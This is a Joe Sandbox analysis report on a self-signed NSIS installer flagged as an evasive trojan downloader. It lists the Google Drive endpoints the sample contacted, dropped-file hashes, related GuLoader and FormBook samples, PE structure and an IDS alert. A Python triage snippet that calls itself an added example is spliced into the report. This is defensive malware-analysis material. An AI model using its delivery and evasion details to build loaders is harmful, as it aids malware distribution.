00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 
00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://apis.google.comQNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorQNuQ5e175D.exefalse
                                high
                                https://drive.google.com/srQNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/0QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/eQNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
IP:142.250.184.206
Domain:drive.google.com
Country:United States
ASN:15169
ASN Name:GOOGLEUS
Malicious:false

IP:172.217.16.193
Domain:drive.usercontent.google.com
Country:United States
ASN:15169
ASN Name:GOOGLEUS
Malicious:false
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1588755
                                      Start date and time:2025-01-11 05:11:45 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 0s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
Number of new started processes analysed:6
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:QNuQ5e175D.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
                                      Detection:MAL
                                      Classification:mal68.troj.evad.winEXE@3/5@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 84%
                                      • Number of executed functions: 52
                                      • Number of non-executed functions: 63
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target QNuQ5e175D.exe, PID 7776 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      No simulations
                                      No context
                                      No context
                                      No context
Match:37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL: Detection, Threat Name; Context
• 7uY105UTJU.exe: malicious, GuLoader; context: 142.250.184.206, 172.217.16.193
• iwEnYIOol8.exe: malicious, FormBook, GuLoader; context: 142.250.184.206, 172.217.16.193
• Ntwph4urc1.exe: malicious, FormBook, GuLoader; context: 142.250.184.206, 172.217.16.193
• 2976587-987347589.07.exe: malicious, Nitol, Xmrig; context: 142.250.184.206, 172.217.16.193
• 2976587-987347589.08.exe: malicious, Nitol; context: 142.250.184.206, 172.217.16.193
• Ntwph4urc1.exe: malicious, FormBook, GuLoader; context: 142.250.184.206, 172.217.16.193
• 2976587-987347589.08.exe: malicious, Unknown; context: 142.250.184.206, 172.217.16.193
• yMXFgPOdf2.exe: malicious, GuLoader; context: 142.250.184.206, 172.217.16.193
• 2976587-987347589.07.exe: malicious, Unknown; context: 142.250.184.206, 172.217.16.193
Match:C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
Associated Sample Name / URL: Detection, Threat Name
• ZoRLXzC5qF.exe: malicious, GuLoader, Snake Keylogger, VIP Keylogger
• letsVPN.exe: malicious, Unknown
• letsVPN.exe: malicious, Unknown
• Revo.Uninstaller.Pro.v5.3.4.exe: malicious, Unknown
• Revo.Uninstaller.Pro.v5.3.4.exe: malicious, Unknown
• Documenti di spedizione.bat.exe: malicious, AgentTesla, GuLoader
• Order NO 000293988494948595850000595995000.exe: malicious, AgentTesla, GuLoader
• kelscrit.exe: malicious, GuLoader, Snake Keylogger, VIP Keylogger
• FiddlerSetup.5.0.20245.10105-latest.exe: malicious, PureLog Stealer, zgRAT
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):5.804946284177748
                                                        Encrypted:false
                                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: ZoRLXzC5qF.exe, Detection: malicious
• Filename: letsVPN.exe, Detection: malicious
• Filename: letsVPN.exe, Detection: malicious
• Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
• Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious
• Filename: Documenti di spedizione.bat.exe, Detection: malicious
• Filename: Order NO 000293988494948595850000595995000.exe, Detection: malicious
• Filename: kelscrit.exe, Detection: malicious
• Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious
                                                        Reputation:moderate, very likely benign file
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:Matlab v4 mat-file (little endian) X, numeric, rows 0, columns 0
                                                        Category:dropped
                                                        Size (bytes):376884
                                                        Entropy (8bit):1.2538694993882065
                                                        Encrypted:false
                                                        SSDEEP:1536:eTJcpruMcjYX8Jf2lBD7XWqllCEYyZB0mFS04:eJcpPIYX8JonFS3
                                                        MD5:943DE1999A45C6772E1F2FB9E1803546
                                                        SHA1:542FC5B588D85BB0E7FCEED47789836A9C428984
                                                        SHA-256:1CCAB41F428AAB780F43CA2C25EB80A63755BD7977DFF975ED662FDB9672D515
                                                        SHA-512:A6AC5B8C7A1DBC2F06888E0F9285A6E1BD39A6C35E021BB5E3DC179E1EA176BEDDC7AD8C49CAEDDD7E10E232F980C7186E05DB890E001BA481E24E9D7EE4C434
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):222843
                                                        Entropy (8bit):7.362565451544298
                                                        Encrypted:false
                                                        SSDEEP:6144:gZ4ZblE1Ev2ugYpg+POgIPWJHbZeowW7H42LK:gZ4ZMEviYpgEHJHbwtKH422
                                                        MD5:20E1BC5AD88D5F2BE5A58EFC3EA1457B
                                                        SHA1:1099DBD1065F6958A014552FD0DF5D26CFF1CFB7
                                                        SHA-256:1FC0AA24E14AC6EA316ED1E1293D9F4B9B19047BCD5BAC97B35E2DB1AEDD7246
                                                        SHA-512:F97570AFF8D400CB300E05A4C57A8EA3D016FA9DC2675CAF89BFAB8B6465A2A021AA201B9E2CBD0472136207B4F92E20775EAF81BB0C926549FE7DD452B260D7
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):37114
                                                        Entropy (8bit):4.648205422140126
                                                        Encrypted:false
                                                        SSDEEP:384:z0GZqpL6AJbzyEyPpyOFYqjG3YL3BM6doOGNblZ9bQZkCC90fFjrBv26dUayacAM:IGKzaZFYqC3500310fhdKtz
                                                        MD5:A2C20BC4DA366C09E9FD86704A33CB0C
                                                        SHA1:91A57F0DDBE7C4E7556BA38BB2CFC8C8C5B52CEC
                                                        SHA-256:2BF4E12311D437A5B61F085C80ED3B3A8C29E77674DAC41F4829E4251C3878A1
                                                        SHA-512:27ADF3C40D1B3583D4104DB2E5A221F0963A25DB7C593426556493EC536C24F2B7866A8B7DF69F8E4127DAE78510B4FC7CAF65660EE2F25EE791C3480E38532B
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):437967
                                                        Entropy (8bit):1.2496824675371185
                                                        Encrypted:false
                                                        SSDEEP:768:YszAIbEHsrUdiWwGdV5C+P4/1F93McF1TWcY7hYu4nR/CFxofOrNYSOq5HGieGwO:YJkFhJAhX55ckvF4ULrV2Ehr3gra5
                                                        MD5:0695A340DE7C3F5F45036C9C9EAFDBD2
                                                        SHA1:D741BBBBFAD62B1D85E87CEDD3F344F4062C33D6
                                                        SHA-256:0020F3470C29CAC49F8521309D6DA437EC6F71B2F5BD41A7B5DD88788B5AC25F
                                                        SHA-512:D2668C1016BBE3DF9CE638D834AA13CC1100D4B85FCB4AC7396DA8166B50F0B2AF0A9025BA35D54A865EC87F356EEEB7A577B000B9B50F8ECC996B3E798CF145
                                                        Malicious:false
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.407220190167989
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:QNuQ5e175D.exe
                                                        File size:585'064 bytes
                                                        MD5:9bb2cdb8508ee2255a35ecec43462a48
                                                        SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
                                                        SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
                                                        SHA512:0b8e8399eb04372c1cb70467dca25078ab255d01c448fa7ccabd620d9066306a1127c4e5caa4af66226662bb3b2d143045b9212332e7408c7b97ea40672a0ac1
                                                        SSDEEP:12288:ifYfUlNHYh6EEfqUhn5i5mfQAsS+6ePZxIgLF7eEbH+aj:ifYMPYcqUhY5mp9+6ehxIg5H9j
                                                        TLSH:E0C4F0257614AC5AC4EC10358BDDDE7B07630F6A7B6C521F73C4BE4C7AB9A816922323
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j.........
                                                        Icon Hash:016c4c4ebe99dd65
                                                        Entrypoint:0x403552
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x660843FB [Sat Mar 30 16:55:23 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
Signature Valid:false
Signature Issuer:CN=nonconverging, O=nonconverging, L=Cliff, C=US
Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:-2146762487 (HRESULT 0x800B0109, CERT_E_UNTRUSTEDROOT)
Not Before:18/03/2024 07:00:38
Not After:18/03/2027 07:00:38
Subject Chain:
• CN=nonconverging, O=nonconverging, L=Cliff, C=US
Trust assessment:self-signed (the issuer is identical to the only subject in the chain), so "Digitally signed: true" gives no assurance about who built the file
                                                        Version:3
                                                        Thumbprint MD5:B0E922076FFE2DF5FE70C6AC8CD556A2
                                                        Thumbprint SHA-1:CE784EA178F07EE5869E76F3117DD8B531152C79
                                                        Thumbprint SHA-256:B8488CDBED36172DB2D61C9AB8ED59564E9285624F8AE446AA90892EF78FB1EC
                                                        Serial:5A5D66BB316E150417CDF6D37A5D77AE424A4754
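The signature fields above reduce to one triage answer. The following added example (not Joe Sandbox code) reproduces that reasoning in Python using only the values printed in this report: it recovers the unsigned HRESULT from the signed "Error Number", recognises the self-signed chain, checks that the WIN_CERTIFICATE blob (IMAGE_DIRECTORY_ENTRY_SECURITY, a file offset) ends exactly at end of file, and derives the certificate's validity window. The HRESULT name table, the verdict labels and the functions themselves are this example's own.

```python
"""Triage of the Authenticode fields reported for QNuQ5e175D.exe.

Added example; not Joe Sandbox code. Inputs are the values printed in the
report; thresholds, labels and helper names are this example's own.
"""
from datetime import datetime

# Values copied from the report.
FILE_SIZE = 585_064
SECURITY_DIR_OFFSET = 0x8E460   # IMAGE_DIRECTORY_ENTRY_SECURITY: a file offset, not an RVA
SECURITY_DIR_SIZE = 0x908
ERROR_NUMBER = -2146762487
NOT_BEFORE = "18/03/2024 07:00:38"
NOT_AFTER = "18/03/2027 07:00:38"
SUBJECT_CHAIN = ["CN=nonconverging, O=nonconverging, L=Cliff, C=US"]
ISSUER = "CN=nonconverging, O=nonconverging, L=Cliff, C=US"

# Well-known Win32 trust HRESULTs (documented constants, not taken from the report).
HRESULT_NAMES = {
    0x800B0109: "CERT_E_UNTRUSTEDROOT",
    0x800B0101: "CERT_E_EXPIRED",
    0x800B0100: "TRUST_E_NOSIGNATURE",
    0x80096010: "TRUST_E_BAD_DIGEST",
}


def hresult_from_signed(error_number: int) -> int:
    """Sandbox reports print the HRESULT as a signed 32-bit int; recover the unsigned value."""
    return error_number & 0xFFFFFFFF


def hresult_name(error_number: int) -> str:
    code = hresult_from_signed(error_number)
    return HRESULT_NAMES.get(code, f"unknown HRESULT 0x{code:08X}")


def signature_blob_at_eof(file_size: int, sec_offset: int, sec_size: int) -> bool:
    """The WIN_CERTIFICATE table is normally the last thing in a signed PE.
    Bytes after it would be an overlay that the signature hash does not cover."""
    return sec_offset + sec_size == file_size


def is_self_signed(subject_chain, issuer: str) -> bool:
    """A one-element chain whose subject equals the issuer: nobody vouched for this key."""
    return len(subject_chain) == 1 and subject_chain[0] == issuer


def signature_verdict(digitally_signed: bool, signature_valid: bool, error_number: int,
                      subject_chain, issuer: str) -> str:
    """Collapse the report's signature fields into one triage label.
    A signature chaining to an untrusted root is worth no more than no signature."""
    if not digitally_signed:
        return "unsigned"
    if signature_valid:
        return "signed-trusted"
    name = hresult_name(error_number)
    if name == "CERT_E_UNTRUSTEDROOT" and is_self_signed(subject_chain, issuer):
        return "signed-self-signed"
    return f"signed-invalid ({name})"


def validity_days(not_before: str, not_after: str, fmt: str = "%d/%m/%Y %H:%M:%S") -> int:
    """Length of the certificate's validity window in days."""
    start = datetime.strptime(not_before, fmt)
    end = datetime.strptime(not_after, fmt)
    return (end - start).days


if __name__ == "__main__":
    print(hresult_name(ERROR_NUMBER))
    print(signature_verdict(True, False, ERROR_NUMBER, SUBJECT_CHAIN, ISSUER))
    print("signature blob ends at EOF:",
          signature_blob_at_eof(FILE_SIZE, SECURITY_DIR_OFFSET, SECURITY_DIR_SIZE))
    print("validity (days):", validity_days(NOT_BEFORE, NOT_AFTER))
```

The masking step is the detail most often got wrong in triage scripts: -2146762487 is simply 0x800B0109 printed as a signed integer. The end-of-file check uses the page's own numbers (0x8e460 + 0x908 = 585,064, the reported file size), so here nothing trails the signature; any bytes after the blob would be unsigned data an installer could carry without invalidating the signature.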
Instructions at entrypoint (0x403552, .text):
                                                        sub esp, 000003F8h
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebp, ebp
                                                        push 00008001h
                                                        mov dword ptr [esp+20h], ebp
                                                        mov dword ptr [esp+18h], 0040A2D8h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [004080A4h]
                                                        mov esi, dword ptr [004080A8h]
                                                        lea eax, dword ptr [esp+34h]
                                                        push eax
                                                        mov dword ptr [esp+4Ch], ebp
                                                        mov dword ptr [esp+0000014Ch], ebp
                                                        mov dword ptr [esp+00000150h], ebp
                                                        mov dword ptr [esp+38h], 0000011Ch
                                                        call esi
                                                        test eax, eax
                                                        jne 00007FB628EDEE4Ah
                                                        lea eax, dword ptr [esp+34h]
                                                        mov dword ptr [esp+34h], 00000114h
                                                        push eax
                                                        call esi
                                                        mov ax, word ptr [esp+48h]
                                                        mov ecx, dword ptr [esp+62h]
                                                        sub ax, 00000053h
                                                        add ecx, FFFFFFD0h
                                                        neg ax
                                                        sbb eax, eax
                                                        mov byte ptr [esp+0000014Eh], 00000004h
                                                        not eax
                                                        and eax, ecx
                                                        mov word ptr [esp+00000148h], ax
                                                        cmp dword ptr [esp+38h], 0Ah
                                                        jnc 00007FB628EDEE18h
                                                        and word ptr [esp+42h], 0000h
                                                        mov eax, dword ptr [esp+40h]
                                                        movzx ecx, byte ptr [esp+3Ch]
                                                        mov dword ptr [004347B8h], eax
                                                        xor eax, eax
                                                        mov ah, byte ptr [esp+38h]
                                                        movzx eax, ax
                                                        or eax, ecx
                                                        xor ecx, ecx
                                                        mov ch, byte ptr [esp+00000148h]
                                                        movzx ecx, cx
                                                        shl eax, 10h
                                                        or eax, ecx
                                                        movzx ecx, byte ptr [esp+0000004Eh]
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x2ac78 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8e460 | 0x908 | .rsrc (the SECURITY entry is a file offset, not an RVA; 0x8e460 + 0x908 = 585,064 = file size, so the signature blob is the last 2,312 bytes of the file)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x68f8 | 0x6a00 | 595406ea4e71ef6f8675a1bd30bcc8f9 | False | 0.6703272405660378 | data | 6.482222402519068 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2a818 | 0x600 | 7a91ec9f1c18e608c3f3f503ba4191c1 | False | 0.5221354166666666 | data | 4.165541189894117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x33000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x68000 | 0x2ac78 | 0x2ae00 | 07533466c1ba02253abde419e160f487 | False | 0.43160076530612246 | data | 5.193823090904089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x68448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3483526558618242
RT_ICON | 0x78c70 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.44647361782636114
RT_ICON | 0x82118 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4737060998151571
RT_ICON | 0x875a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.44355219650448746
RT_ICON | 0x8b7c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5286307053941909
RT_ICON | 0x8dd70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5811444652908068
RT_ICON | 0x8ee18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5748933901918977
RT_ICON | 0x8fcc0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6860655737704918
RT_ICON | 0x90648 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7224729241877257
RT_ICON | 0x90ef0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.49146341463414633
RT_ICON | 0x91558 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.5440751445086706
RT_ICON | 0x91ac0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7668439716312057
RT_ICON | 0x91f28 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6263440860215054
RT_ICON | 0x92210 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7128378378378378
RT_DIALOG | 0x92338 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x92438 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x92558 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x925b8 | 0xca | data | English | United States | 0.6237623762376238
RT_VERSION | 0x92688 | 0x2b0 | data | English | United States | 0.5232558139534884
RT_MANIFEST | 0x92938 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T05:13:09.535463+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 142.250.184.206 | 443 | TCP
